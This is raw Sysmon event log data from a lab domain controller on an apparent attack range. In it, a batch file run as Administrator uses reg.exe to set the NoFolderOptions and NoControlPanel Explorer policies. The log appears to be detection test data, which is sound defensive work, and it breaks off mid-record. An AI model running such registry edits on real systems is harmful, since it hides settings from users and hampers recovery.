10341000x80000000000000009138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-64C5-6064-A500-00000000AE01}43561144C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+18d25c|C:\Windows\System32\SHELL32.dll+18cfb3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.654{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" "C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.006{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07744DD7772B1C92CB276DD86C1D3D8A,SHA256=CB53AC6E4F5B956F26BE566EAFA620E3D4F82C15742701AF9066A0C1298A94A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.723{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F2D8E8B9CC3EF12A81D9004836B2EF,SHA256=D08CB0CE2BE746337A4FE39B9625FA1BB0C8F2C54B00B129F83C59D3255220DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.692{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C8FDD60ACDB7E2D51CA29C42DC8879D1,SHA256=1F735DC0113051C925BD912B3BADB575A8A8B1AE83193C2B7FCADDABD98E690B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.692{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B6B1A164AECB6DE8BF01815915D7762C,SHA256=23D7F0427466D6E6EA1F32E8B83B47B9B4EF4893B2FC79014A2DA76975036EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.677{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DFB050648EA31B98F80FC26040819F,SHA256=00DDEA678912818404096C24E297608AC106263E74F0F83944CCDC774D2F18FF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.614{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptionsDWORD (0x00000001) 10341000x80000000000000009465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.621{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.614{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptionsDWORD (0x00000001) 10341000x80000000000000009456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.609{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.599{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanelDWORD (0x00000001) 10341000x80000000000000009447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3F01-00000000AE01}4156C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.583{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 